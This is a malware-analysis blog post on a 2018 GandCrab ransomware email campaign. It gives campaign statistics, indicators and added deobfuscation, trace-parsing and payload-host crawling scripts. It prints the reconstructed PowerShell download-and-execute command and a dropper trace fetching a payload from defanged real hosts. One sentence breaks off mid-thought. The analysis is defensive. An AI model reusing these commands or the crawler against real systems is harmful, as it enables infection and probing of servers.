GandCrab Swarm

Posted on 2018-04-17 by Pedram Amini

In early April of 2018 we noticed a spike in malicious activity, sourced mostly from Asia and delivered via SMTP. This post covers our exploration of the campaign and the eventual realization that it is responsible for distributing a mix of garden-variety malware, including GandCrab ransomware. If you've been infected, check out this free decryptor. For technical readers, check out @hasherezade's GandCrab IDA Python string deobfuscator utility on GitHub.

GandCrab Swarm

The campaign is far from stealthy, and we're certainly not the first to write about it. See the Further Reading section below for additional articles and utilities. We first noticed the campaign through a significant uptick in threats delivered as malicious e-mail attachments following the naming convention DOC[0-9]{10}.zip (the literal prefix DOC, ten digits, and a .zip extension). Example file names include:

  • DOC1385624908.zip
  • DOC1614310849.zip
  • DOC2138630325.zip
  • DOC2229418534.zip
  • DOC3054722748.zip
  • ...

In the cases we observed, the archive contained either a malicious macro-dropper document or a malicious JavaScript file. We observed ~3,000 unique IP addresses spanning 427 ASNs (see appendix). Analyzing the source IPs of the campaign reveals a heavy slant toward Asia. We're using the handy distribution utility here if you're curious:

[pedram@kb 2018-04-doc0]$ cat doc0.countries | distribution
    Key|Ct   (Pct)    Histogram
     VN|2991 (52.44%) -------------------------------------------------------
     IN| 963 (16.88%) --------------------
     CN| 416  (7.29%) ---------
     BD| 184  (3.23%) ----
     RU| 169  (2.96%) ----
     ID| 121  (2.12%) ---
     KZ|  99  (1.74%) ---
     LA|  68  (1.19%) --
     TH|  67  (1.17%) --
     PK|  62  (1.09%) --
     MN|  61  (1.07%) --
     UA|  48  (0.84%) -
     KH|  48  (0.84%) -
     KG|  41  (0.72%) -

Macro Dropper

An example malicious document can be found in our GitHub repo for malware samples:

Of the dozens of macro droppers we harvested, we isolated 6 uniquely generated macros, all of which employ the same heavy string-obfuscation tactics. Tallying the function calls across them shows that Replace() and StrReverse() alone account for over 80% of all calls:

[pedram@kb 2018-04-doc0]$ grep "(" * | cut -d':' -f2 | tr -d ' '  | cut -d'=' -f2 | cut -d'(' -f1 | distribution
            Key|Ct   (Pct)    Histogram
        Replace|1840 (44.12%) ------------------------------------------
     StrReverse|1540 (36.93%) -----------------------------------
          Space| 111  (2.66%) ---
          UCase|  99  (2.37%) ---
            Mid|  92  (2.21%) ---
           Left|  87  (2.09%) --
          LTrim|  87  (2.09%) --
          Right|  79  (1.89%) --
          RTrim|  79  (1.89%) --
        StrConv|  68  (1.63%) --
          Split|  18  (0.43%) -
         UBound|   6  (0.14%) -
          Shell|   6  (0.14%) -

All of this string juggling exists to rebuild a command line at run time and hand it to Shell(). Note the second argument, 0 (vbHide), which runs the spawned process with its window hidden:

[pedram@kb 2018-04-doc0]$ grep Shell *
5ab51aaa4e781063c21ceca884ffe4177a24f3a49f164f7a7095ac16161a4e6a.macro
549:            Shell (StrReverse(StrReverse(GAMI))), 0

9bb808c1ec544f71c1f6730cbaf0d24337e22a4f92f6078b8ba794d596a87a5e.macro
750:            Shell (mbRq), 0

521b7acbb766010ad49b2344a32ec20663d2328fb9c8a846f1ac8cc7a4895f42.macro
422:            Shell (StrReverse(StrReverse(nVBj))), 0

20bf59ea08052f282666570f12402be8f4eaf3b1ccaf00c7d6f4f645a2ddbc78.macro
422:            Shell (StrReverse(StrReverse(nVBj))), 0

5849f63af8e041cd2690efd7a7638c1b7185a9aa497a2322be01d36d314507f8.macro
643:            Shell (StrReverse(StrReverse(fCOY))), 0

ca72e019c23658547a73c613e4bf3a39e2d603b260c2e227adab74efc6fdc7bb.macro
643:            Shell (StrReverse(StrReverse(fCOY))), 0

The reconstructed command is a PowerShell pivot that downloads a second-stage payload (a PE executable) from, in this case, a server in the UK and then executes it. Here -w 1 is shorthand for -WindowStyle Hidden, so the PowerShell window is hidden as well. Note also that GetTempPath() already returns a path with a trailing backslash, so the literal '\bKKc.exe' produces a double backslash, which Windows accepts:

powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('hxxp://185[.]189.58.222/da.exe',([System.IO.Path]::GetTempPath()+'\bKKc.exe'));

powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\bKKc.exe')
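To see what the function soup in the histogram actually resolves to, here is an added example (our illustration, not code from the post or from the harvested macros): a small Python evaluator for the VBA string built-ins listed above, run over a constructed macro fragment that builds its command the same way the samples do. The variable name, the TEST-NET-3 address standing in for the real host, and the defanged hxxp scheme are all assumptions.

```python
import re

# Constructed sample in the style of the harvested macros (hypothetical variable,
# TEST-NET-3 address, defanged scheme). Raw string: the backslash is literal.
SAMPLE_MACRO = r'''
nVBj = StrReverse("exe.llehsrewop")
nVBj = nVBj & Space(1) & Replace("-QQw 1", "QQ", "")
nVBj = nVBj & " (New-Object System.Net.WebClient)."
nVBj = nVBj & UCase("d") & Mid("xxownloadFile(", 3)
nVBj = nVBj & StrReverse("'exe.ad/01.311.0.302//:pxxh'")
nVBj = nVBj & Left(",([System.IO.Path]::GetTempPath()+'\bKKc.exe'));XXXX", 48)
Shell (StrReverse(StrReverse(nVBj))), 0
'''

TOKEN_RE = re.compile(r'\s*(?:(?P<str>"(?:[^"]|"")*")|(?P<num>\d+)|(?P<name>[A-Za-z_]\w*)|(?P<punct>[(),&]))')

def tokenize(text):
    """Split one VBA expression into (kind, value) tokens; "" inside a literal is an escaped quote."""
    tokens, pos, text = [], 0, text.strip()
    while pos < len(text):
        m = TOKEN_RE.match(text, pos)
        if not m:
            raise ValueError(f'unsupported syntax near {text[pos:pos + 12]!r}')
        kind, value, pos = m.lastgroup, m.group(m.lastgroup), m.end()
        if kind == 'str':
            value = value[1:-1].replace('""', '"')
        elif kind == 'num':
            value = int(value)
        tokens.append((kind, value))
    return tokens

# The VBA string built-ins from the histogram, mapped to Python (Mid/Left/Right are 1-based).
BUILTINS = {
    'strreverse': lambda s: s[::-1],
    'replace': lambda s, old, new: s.replace(old, new),
    'ucase': str.upper, 'lcase': str.lower,
    'ltrim': str.lstrip, 'rtrim': str.rstrip, 'trim': str.strip,
    'space': lambda n: ' ' * n,
    'chr': chr,
    'left': lambda s, n: s[:n],
    'right': lambda s, n: s[-n:] if n else '',
    'mid': lambda s, start, length=None: s[start - 1:] if length is None else s[start - 1:start - 1 + length],
    'strconv': lambda s, conv: {1: s.upper(), 2: s.lower()}[conv],  # vbUpperCase / vbLowerCase only
}

class Evaluator:
    """Recursive-descent evaluator for the subset the droppers use:
    literals, variables, nested built-in calls and & concatenation."""

    def __init__(self):
        self.env = {}

    def evaluate(self, expr):
        self.toks, self.i = tokenize(expr), 0
        value = self._concat()
        if self.i != len(self.toks):
            raise ValueError('trailing tokens in expression')
        return value

    def _peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def _take(self, expected=None):
        tok, self.i = self._peek(), self.i + 1
        if expected is not None and tok != ('punct', expected):
            raise ValueError(f'expected {expected!r}, got {tok!r}')
        return tok

    def _concat(self):
        value = self._primary()
        while self._peek() == ('punct', '&'):
            self._take()
            value = str(value) + str(self._primary())
        return value

    def _primary(self):
        kind, value = self._take()
        if kind in ('str', 'num'):
            return value
        if kind == 'punct' and value == '(':
            inner = self._concat()
            self._take(')')
            return inner
        if kind == 'name' and self._peek() != ('punct', '('):
            if value not in self.env:
                raise NameError(f'undefined variable {value}')
            return self.env[value]
        if kind == 'name':
            self._take('(')
            args = []
            if self._peek() != ('punct', ')'):
                args.append(self._concat())
                while self._peek() == ('punct', ','):
                    self._take()
                    args.append(self._concat())
            self._take(')')
            if value.lower() not in BUILTINS:
                raise NameError(f'unsupported function {value}')
            return BUILTINS[value.lower()](*args)
        raise ValueError(f'unexpected token {kind} {value!r}')

SHELL_RE = re.compile(r'Shell\s*\((.*)\)\s*,\s*(\d+)\s*$', re.I)
ASSIGN_RE = re.compile(r'([A-Za-z_]\w*)\s*=\s*(.*)$')

def deobfuscate(macro):
    """Run the assignment lines, then return (command, window_style) from the Shell() call."""
    ev, command, style = Evaluator(), None, None
    for raw in macro.splitlines():
        line = raw.strip()
        if not line or line.startswith("'"):  # blank line or VBA comment
            continue
        m = SHELL_RE.match(line)
        if m:
            command, style = ev.evaluate(m.group(1)), int(m.group(2))
            continue
        m = ASSIGN_RE.match(line)
        if m:
            ev.env[m.group(1)] = ev.evaluate(m.group(2))
            continue
        raise ValueError(f'unsupported statement: {line}')
    return command, style

if __name__ == '__main__':
    cmd, style = deobfuscate(SAMPLE_MACRO)
    print(f'Shell window style: {style} (0 = vbHide)')
    print(cmd)
```

Real macros also carry Dim statements, Sub wrappers and the occasional arithmetic, so the statement matcher is deliberately strict and raises on anything it does not understand rather than guessing. The point is that the obfuscation is purely syntactic: once the built-ins are emulated, the StrReverse(StrReverse(...)) wrappers and Replace() junk tokens collapse to the same PowerShell pivot shown above.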

We've extracted a half dozen macros from live samples and made them available on Github.com/InQuest/malware-samples for anyone who is interested.

JavaScript Dropper

Example malicious JavaScript payloads can be found at Github.com/InQuest/malware-samples; we'll dissect this one here:

At the highest level, the heavily obfuscated JavaScript will:

  • Loop until a non-200 OK response is received from the C&C server at GET hxxp://hgpjrvccsollfwbq[.]com.
  • Download the payload from hxxp://112[.]126.94.107/shop/k.exe.
  • Save the downloaded file as featherstrail.exe under the temporary folder (%TEMP%) and execute it. In the emulated trace below the path appears as undefined\featherstrail.exe because GetSpecialFolder() returned undefined in the emulator and JavaScript concatenated it as text; on a real host this resolves to the %TEMP% directory.

You can see the trace of this activity in the following log:

ActiveXObject initialized: ["Scripting.FileSystemObject"]
  [Scripting.FileSystemObject].GetSpecialFolder() called
ActiveXObject : ["WinHttp.WinHttpRequest.5.1"]
ActiveXObject : ["MSXML2.XMLHTTP"]
  [MSXML2.XMLHTTP].open() called:
      ["GET", "hxxp://hgpjrvccsollfwbq[.]com/", false]
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
ActiveXObject initialized: ["WScript.Shell"]
ActiveXObject initialized: ["ADODB.Stream"]
  [ADODB.Stream].Open() called: []
  [ADODB.Stream].Write() called: [undefined]
  [ADODB.Stream].SaveToFile() called: ["undefined\featherstrail.exe"]
  [ADODB.Stream].Close() called: []
WScript.run() called: ["cmd /c undefined\featherstrail.exe", 0, 0]
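Traces like the one above are worth parsing rather than reading by hand, because the same dropper family produces the same call shape with different URLs and file names. The following is an added example (not part of the post, and not InQuest tooling) that turns the emulator trace into an IOC summary: ProgIDs instantiated, HTTP requests with repeat counts, files written and commands executed. The trace text is the one printed above, embedded verbatim as the input; the log format of the emulator is assumed to be exactly what is shown there.

```python
import re
from collections import Counter

# The emulator trace from the post, embedded as input (raw string: backslashes are literal).
SAMPLE_TRACE = r'''
ActiveXObject initialized: ["Scripting.FileSystemObject"]
  [Scripting.FileSystemObject].GetSpecialFolder() called
ActiveXObject : ["WinHttp.WinHttpRequest.5.1"]
ActiveXObject : ["MSXML2.XMLHTTP"]
  [MSXML2.XMLHTTP].open() called:
      ["GET", "hxxp://hgpjrvccsollfwbq[.]com/", false]
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
  [WinHttp.WinHttpRequest.5.1].open() called with arguments:
      ["GET", "hxxp://112[.]126.94.107/shop/k.exe", 0]
  [WinHttp.WinHttpRequest.5.1].send() called.
ActiveXObject initialized: ["WScript.Shell"]
ActiveXObject initialized: ["ADODB.Stream"]
  [ADODB.Stream].Open() called: []
  [ADODB.Stream].Write() called: [undefined]
  [ADODB.Stream].SaveToFile() called: ["undefined\featherstrail.exe"]
  [ADODB.Stream].Close() called: []
WScript.run() called: ["cmd /c undefined\featherstrail.exe", 0, 0]
'''

PROGID_RE = re.compile(r'^ActiveXObject[^\[]*\["([^"]+)"\]')
# "[Obj].method() called..." or "Obj.method() called..."; args may sit on the same line.
CALL_RE = re.compile(r'^(?:\[(?P<obj>[^\]]+)\]|(?P<top>[A-Za-z]\w*))\.(?P<method>\w+)\(\)\s+called'
                     r'(?:[^:\[]*:\s*(?P<args>\[.*\]))?')
STR_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # quoted strings inside the JS-style argument array

def _record(report, obj, method, strings):
    method = method.lower()
    if method == 'open' and len(strings) >= 2:      # XMLHTTP / WinHttp open(verb, url, async)
        report['requests'].append((strings[0].upper(), strings[1]))
    elif method == 'savetofile' and strings:
        report['files_written'].append(strings[0])
    elif method == 'run' and strings:
        report['commands'].append(strings[0])

def parse_trace(text):
    report = {'progids': [], 'requests': [], 'files_written': [], 'commands': []}
    pending = None                                   # call whose arguments follow on the next line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PROGID_RE.match(line)
        if m:
            report['progids'].append(m.group(1))
            continue
        m = CALL_RE.match(line)
        if m:
            obj = m.group('obj') or m.group('top')
            if m.group('args') is None and line.endswith(':'):
                pending = (obj, m.group('method'))
            else:
                pending = None
                _record(report, obj, m.group('method'), STR_RE.findall(m.group('args') or ''))
            continue
        if pending and line.startswith('['):
            obj, method = pending
            pending = None
            _record(report, obj, method, STR_RE.findall(line))
    return report

def request_counts(report):
    """URL -> number of requests; repeats expose the download retry loop."""
    return Counter(url for _, url in report['requests'])

def emulation_artifacts(report):
    """Paths containing the literal 'undefined': GetSpecialFolder() returned undefined in the
    emulator and JavaScript concatenated it as text, so on a real host these live under %TEMP%."""
    return [p for p in report['files_written'] + report['commands'] if 'undefined' in p]

if __name__ == '__main__':
    rep = parse_trace(SAMPLE_TRACE)
    print('ProgIDs:', rep['progids'])
    for url, n in request_counts(rep).items():
        print(f'{n}x GET {url}')
    print('written:', rep['files_written'], 'executed:', rep['commands'])
    print('emulator artifacts:', emulation_artifacts(rep))
```

The retry count is the detail worth keeping: five identical requests for k.exe in a row is the signature of a download loop, and it distinguishes this dropper from a one-shot fetch when you compare traces across samples.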

Second Stage Payloads

The second-stage payloads were seen hosted on French, British, and Chinese servers (see appendix): in one case a seemingly compromised China-based shopping site (112[.]126.94.107), in another a seemingly fresh install of CentOS (185[.]189.58.222).

Having identified a second-stage payload host, and realizing that the payloads follow a basic naming convention (a one- to three-character name with an extension such as .exe or .doc), we brute-force crawled this limited space to unveil the following list of additional payloads. All were active at the time of writing. On a side note, for more complex brute-force patterns we recommend checking out rexgen.

URL MIME / SHA256
hxxp://185[.]189.58.222/d.doc application/msword
Dropper: 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
hxxp://112[.]126.94.107/shop/d.doc application/msword
Dropper: 6a8778a466c66a4a6df07163459bbe5cb4971109a3a4057330bc7c07014f7462
hxxp://185[.]189.58.222/sry.exe application/octet-stream
GandCrab?: f921949f9bf653b37fb73065834141862dc433ca12db8905f07face35f2d652a
hxxp://185[.]189.58.222/huh.exe application/octet-stream
GandCrab: 298db98676cebbeab5b7d1aee14521363eee533755e99132c7efe3322d99d691
hxxp://185[.]189.58.222/ps.exe application/octet-stream
RanserKD: f851dbbdafa4aa24548789d21b30f0e6248393d6813d9f21ac0627fdc1eb4b18
hxxp://185[.]189.58.222/as.exe application/octet-stream
73f0880358701566ed1792014b639c02f357da42981344a6ad644aae494d3e36
hxxp://185[.]189.58.222/da.exe application/octet-stream
GandCrab: 6d1e7233c698c47c231e7d89500ddca5dc7a2efb12611395848ea024c01f6e57
hxxp://185[.]189.58.222/s.exe application/octet-stream
Trik.pdb: a753017ff3428b51543961f07a087b6f625b43b029580d2046a89c3c7136b3d5
hxxp://185[.]189.58.222/k.exe application/octet-stream
GandCrab: 71391d3dfa01284ebdd2aff07414ec1cf203caca625e6f26d6507ec3974b421c
hxxp://185[.]189.58.222/f.exe application/octet-stream
Ransort.pdb: f5f30a0187d94e3a4e61d614c2a36d21e79e9aadb9dd3082adc4e69962d35bca
hxxp://112[.]126.94.107/shop/wat.exe application/octet-stream
Trik.pdb: 09ef6c20ebcaa676f3f682f220c60d4336a11321ce876bab44834cd7ae159326
hxxp://112[.]126.94.107/shop/k.exe application/octet-stream
GandCrab: 053b9fdab60ab124178e23b4598f2b10e71b2caf1abcfa51c857f0801f555131
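The brute-force crawl described above is simple to reproduce, and the interesting part is what you do with a hit: record the hash, identify the file by its magic bytes, and flag cases where the extension or the served MIME type disagrees with the content. The following is an added example (ours, not the post's crawler and not rexgen) that enumerates the one- to three-letter name space for the two extensions the post names and triages each 200 response. To run offline it uses a constructed fake host at a TEST-NET-3 address with header-only fake files; a live run would replace fake_fetch with an HTTP client, rate-limited and run from a disposable host.

```python
import hashlib
import itertools
import string

EXTENSIONS = ('exe', 'doc')          # the two payload types named in the post

# File-type magic for the payload kinds in the table above.
MAGIC = (
    (b'MZ', 'PE executable'),
    (b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1', 'OLE2 compound document'),
    (b'PK\x03\x04', 'ZIP container'),
)
EXPECTED_KIND = {'exe': 'PE executable', 'doc': 'OLE2 compound document'}

def candidate_names(max_len=3, alphabet=string.ascii_lowercase, extensions=EXTENSIONS):
    """Yield every 1..max_len letter stem with every extension, shortest names first."""
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            for ext in extensions:
                yield ''.join(chars) + '.' + ext

def keyspace_size(max_len=3, alphabet_size=26, n_ext=len(EXTENSIONS)):
    return n_ext * sum(alphabet_size ** n for n in range(1, max_len + 1))

def identify(body):
    for magic, kind in MAGIC:
        if body.startswith(magic):
            return kind
    return 'unknown'

def sha256_hex(body):
    return hashlib.sha256(body).hexdigest()

def triage(name, content_type, body):
    """Record what the server claimed (MIME) next to what the bytes say, plus the hash."""
    kind = identify(body)
    ext = name.rsplit('.', 1)[-1]
    return {
        'name': name,
        'content_type': content_type,
        'kind': kind,
        'sha256': sha256_hex(body),
        # extension says one thing, bytes say another (e.g. a PE served as k.doc)
        'ext_mismatch': ext in EXPECTED_KIND and EXPECTED_KIND[ext] != kind,
    }

def crawl(base_url, fetch, max_len=3):
    """Request base_url + name for every candidate. fetch(url) returns
    (status, content_type, body) or None; only 200 responses with a body count as hits."""
    hits = []
    for name in candidate_names(max_len):
        resp = fetch(base_url + name)
        if resp is None:
            continue
        status, content_type, body = resp
        if status == 200 and body:
            hits.append(triage(name, content_type, body))
    return hits

# Constructed stand-in for a payload host (TEST-NET-3 address, header-only fake files).
# 'k.doc' is deliberately a PE served under a .doc name to exercise the mismatch flag.
FAKE_PE = b'MZ' + b'\x90' * 58 + b'\x40\x00\x00\x00' + b'PE\x00\x00'
FAKE_DOC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' + b'\x00' * 24
FAKE_HOST = {
    'hxxp://203.0.113.10/da.exe': (200, 'application/octet-stream', FAKE_PE),
    'hxxp://203.0.113.10/d.doc': (200, 'application/msword', FAKE_DOC),
    'hxxp://203.0.113.10/k.doc': (200, 'application/msword', FAKE_PE),
}

def fake_fetch(url):
    return FAKE_HOST.get(url, (404, 'text/html', b''))

if __name__ == '__main__':
    print(f'{keyspace_size()} candidate URLs per host')
    for hit in crawl('hxxp://203.0.113.10/', fake_fetch):
        print(hit)
```

Two letters and two extensions already give 36,556 URLs per host, which is why the post restricts the alphabet to what the observed names actually use; widening to digits or mixed case grows the space quickly, and at that point a generator such as rexgen over a precise pattern beats a blind product of the alphabet.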

Source ASNs

We observed ~3,000 unique IP addresses spanning the following 427 ASNs:

768, 812, 2119, 2856, 3320, 3462, 4134, 4621, 4755, 4760, 4761, 4788, 4795, 4800, 4818, 4837, 5563, 6332, 6503, 6697, 6703, 6712, 6789, 6830, 6846, 6849, 6876, 7470, 7545, 7552, 7565, 7922, 8100, 8151, 8193, 8334, 8359, 8402, 8427, 8449, 8452, 8551, 8585, 8708, 8711, 8712, 8732, 8890, 8997, 9105, 9121, 9198, 9260, 9304, 9422, 9498, 9808, 9829, 9830, 9873, 9902, 9930, 9934, 10010, 10076, 10109, 10199, 10219, 10225, 10620, 11172, 11427, 11562, 12389, 12430, 12714, 12716, 12735, 12764, 12997, 13099, 13188, 13194, 13489, 13591, 13999, 14061, 14080, 15491, 15493, 15723, 15774, 16010, 16066, 16960, 17426, 17465, 17483, 17488, 17557, 17621, 17658, 17665, 17747, 17754, 17762, 17771, 17813, 17970, 18001, 18002, 18059, 18207, 18209, 18403, 18734, 19429, 20115, 20539, 20549, 20771, 21017, 21087, 21104, 21127, 21183, 21299, 21312, 21479, 21497, 22773, 23673, 23678, 23682, 23700, 23860, 23888, 23893, 23947, 23969, 24086, 24186, 24203, 24309, 24320, 24323, 24389, 24432, 24435, 24444, 24445, 24547, 24554, 24560, 24955, 25019, 25106, 25139, 25159, 25229, 25249, 25454, 25513, 27738, 27747, 27884, 27947, 27951, 28006, 28378, 28509, 28531, 28532, 28537, 28545, 28554, 28573, 28738, 28769, 28787, 28812, 29061, 29091, 29124, 29497, 29584, 30619, 30922, 31036, 31145, 31148, 31163, 31213, 31252, 31286, 31287, 31585, 32244, 33788, 34145, 34602, 34814, 34975, 34984, 35004, 35104, 35362, 35566, 35728, 35807, 35816, 35819, 36907, 37061, 37209, 37284, 37308, 37398, 37424, 37425, 37489, 38019, 38067, 38193, 38203, 38264, 38266, 38457, 38511, 38623, 39047, 39280, 39407, 39529, 39709, 39714, 39927, 41557, 41661, 41682, 41733, 41750, 41794, 41997, 42362, 42610, 42713, 43145, 43182, 43258, 43370, 43554, 43594, 43727, 43733, 43925, 44267, 44395, 44895, 45025, 45043, 45117, 45194, 45235, 45245, 45289, 45326, 45335, 45458, 45498, 45514, 45543, 45582, 45588, 45629, 45694, 45727, 45766, 45769, 45773, 45774, 45775, 45804, 45820, 45899, 45903, 45905, 45925, 45942, 45951, 46042, 47140, 47237, 47759, 47975, 
48094, 48176, 48212, 48503, 48524, 48642, 48882, 49461, 49749, 49800, 50009, 50025, 50223, 50306, 50544, 51004, 51009, 51034, 51035, 51904, 52609, 53085, 55406, 55410, 55441, 55511, 56040, 56041, 56044, 56046, 56124, 56255, 56354, 57128, 57261, 57334, 57944, 58405, 58587, 58640, 58691, 58717, 58765, 58906, 58969, 59332, 59341, 59347, 59362, 59523, 59552, 59671, 60258, 60411, 63862, 63961, 63969, 64063, 64072, 64075, 131127, 131178, 131210, 131246, 131267, 131464, 132137, 132220, 132453, 132525, 132730, 132768, 132770, 132933, 132941, 133001, 133011, 133168, 133177, 133232, 133255, 133293, 133331, 133443, 133450, 133481, 133597, 133613, 133661, 133700, 133814, 134000, 134006, 134009, 134033, 134056, 134128, 134186, 134204, 134293, 134341, 134371, 134708, 134810, 134813, 134853, 134932, 134970, 135371, 135527, 135597, 135607, 135654, 135718, 135872, 136276, 136393, 136498, 136514, 196629, 197254, 197275, 197311, 197585, 201986, 207133, 262186, 262928, 263170, 264821, 327826

Carrier Samples

Of the myriad samples we observed in the wild, the following are available from VirusTotal Intelligence. It is of some minor interest to note that all of the following samples were uploaded

1.  01072c19714bdf73017d22275ffed4f40cb99891fc019798b495f6415a9f08b9
2.  04ef17f7052a01b3091eb1190c8072e283da99c6a61cfee9cde8d1ff4fd4f1a3
3.  0641176e5865e840509ef0ea4aa779aa662ce64917c715b2865d1372b9cf0080
4.  0732dff16daadf858388ba85bb311fb0d03aab979d3354fa75a0e91d3ba71668
5.  094e1e556dca8146eefa43e88a16c2c3eebdc867a35ac29c239505a0b6f828ce
6.  0b1550624d76cf74a3928466d09cd8359f8deb2980c4d54c4b0dad183e6e8029
7.  0b2da90d5102933162a7bdb6794a506d946a5d960325d09c5bdfe0858e476ad8
8.  0cb41a2c20720fa3051047b80d4aa0dbbb8dd74a0d3d0e4051c2bd969b9b7c77
9.  0f2b93d78c4d145408ee7aa192698da9fbc717022fe68f533dd204293ef384b3
10. 18b8e3b30e757bc362bcfcbd5dc90916133fe3377b88028e56434052bc72288b
11. 18ec003eccabb265f9c1a26a4384565620e357f7c079c2e879f7a16080762fb8
12. 1b6bf58f019cbb8c08bd66a6a361991d1e9d619a8340c823b1a1acc90a298e43
13. 1edf1c4049f663236424d4ee9b8de923b416f4af75dbf5bf971e0b85de01d94b
14. 1fae994859b8ac5e3ffc64c721ce40f8787d9836f4de3edb52112ab84bd58c1b
15. 2c2f282428cb09fb97d9da1fdbe8a83278ef8228bb4438ef38a1cdbf83cb3d13
16. 2f0de44c668c67b649c355e8d35106bf60ef002af84b7246ee6ad8ff5a341f56
17. 30a5e1860249f40fdcd176c223ea78824fa2181d3ebc76d2f64f3397a181aed7
18. 311b10a28b8f9a4de7c508b557f3131103ad11f35a39b82898903ba59f12f32f
19. 3734ae24bb1c0b392b9e2e9606729cf11074b07a234dd93c30e6964dcefb85eb
20. 37d1a9b24aa796d428baa5cdbc848e7d04b6a28aa04faebce8b3efc15109e2f4
21. 37e3ae5b476298cfa05b8cf9128c8a0216aa9870b10b23835629653e1300aa7a
22. 3912109d9f9ceea82d08c67a1b033f7a509db81f5ee4dfa9bcdf12b2101051c9
23. 391e1243413cbbdd17ddbd499c473b9ed180003a868d75c6fecb92446ff7f5b9
24. 39d95449fca6c188bfc9f2eb599804a86ddde41774fefa0edc894118e978a525
25. 3aaa8d3cc6291dff27de7a9d0bd4dc28c59207a6641f86f510ed36fd0df88e7e
26. 3cefbe4498aabf3b0160c979a4f382446c1156187bfd6b9cabeeff64b7685fc4
27. 4350cc33108a98f9491515e8855ecf1f550e70e39be2f351b88356f11fa5760d
28. 45fc9542235efd93f9a898df898ec7fa1bac8d1f56365d7d4bede7d6a33470ef
29. 4b22ced5138d6f1b4e69c31c3a6558638a652efda90b067e4f267144841f84fc
30. 4cfab88fa7dd90785bdf0d52753c2a40e2c6fdba93a1635d8b1b7eb4fdb91fb2
31. 5365e92f544c83b1bff8eeb440ad620cdb308ffd1d96f732d6a399511493ed7f
32. 56e3d0f0093de7d52feb62e97fa7532056047546375452a0f59e8f682ae235e5
33. 576313b11f51a8e2191689fc146409897e719bb83d967c14ea53306ed3369572
34. 596ecf4f1c762d20d353f6382f982bbf57e1b4e062c6f796600fe53028b68efb
35. 59d12676e116055028c272e404046b70ca3a885137faf28e2b1a074833d4104d
36. 5e222eb6ff5b474d5eb4b450448ec6f47783190312a782a0365e761be97e35cf
37. 6ae1213bc50d25f5d6335a2c1652440bbc295e3cd1214a16a11fa216b5ebfc6d
38. 6d8e7e0e38d697f85d82f8f528a10d4c0dda7bc0fa0bb7624809893d61203e7a
39. 6d9b225458f556556e8a91de96c9d292f1b179e4660569ef21e97e5fdc0e6257
40. 6e5ed1fa3afbb74e1a35a80cfddf5d7cb1ddacd02e7f049e61808d0409a04ef4
41. 74ce529e2d09971ab43cd86ab455d66bc53b5cf64607b754fe4b51f823397427
42. 7776ac0c61015d2e5cec12054f01301dd6e34eb08c35c29b9e0769d45498d78f
43. 79e7043fa72f70d961b7de31bec3d6768e4a331403b56de451fb9d8c8582ca86
44. 79fa9eb242b88ccae36c441b8d25f444b2c7186c446019636595e9c410d88e17
45. 8351070808b7b7541f99b7f75dec59ea7713ccdc9fbd521152c813445e01156c
46. 85f82adef8badabf7a5ed7a5f987ca8f611db9cddaffe6e60cff5a4167d19062
47. 88867b7ae4fb6d396d5a1e07edee16c495a77f943b4cd08df8fb3dad1b703012
48. 8c33bf2c9f4f93883f5568c374b53fac4d337a7aaf64eb4d1b776fc73433c051
49. 8e0373ad55b692b6e857b4d533e6b67445eb4af3d3542c25440f16737d622187
50. 8e6643d6224e3c3a3a39abed0291b34f526e9e15662f6fbd319b141ea67a8400
51. 8f2d995c2bfddac4992737bb94d97c85035ae8ba20ffb0a7894f123b1ac253c2
52. 8f77b27596cb18a4e7c56bc28f18fa4648d328210a36d62c456bb31084426ff4
53. 91ac0eae541c351122daaeb9ef2042508b8bc10816cc056c7b6d4a717f05a76e
54. 9c9ec33955cc9144dffb97095dd8be8ffc7a676eaf99da63d113775ca7a9d7c9
55. a3bd170a56e43d123f928e5978d51e24fdcc708382c5a8d86c1dbe2e67538148
56. a53c7526939cfd8d609c77b5b6a6da82329efc017e91f203d57934da0ed8637f
57. a601d9742b306384796a7a6f835c8a979179c9f516bd17ba7185f7d331b4db2d
58. a953e225ec770230c100281dc8d3820b63461740214fa6471580fbba6048378c
59. a9995695776b7a17d1ac86b8b47fbcd94d190c42c6d3838417749d57b03f9e07
60. ba1bc1c75ff7aec30d48d47284d120d7a1a862a44e86e63094afbca5cc6f1578
61. bb81c9f62bcb5efb54792925e8a7d3d9a53e1d9ec10a6616c1d670967762a9cb
62. bd2193869e8fad55ebdb29f3acc7a3e9d5df81a3390c19b936d4035f990f2842
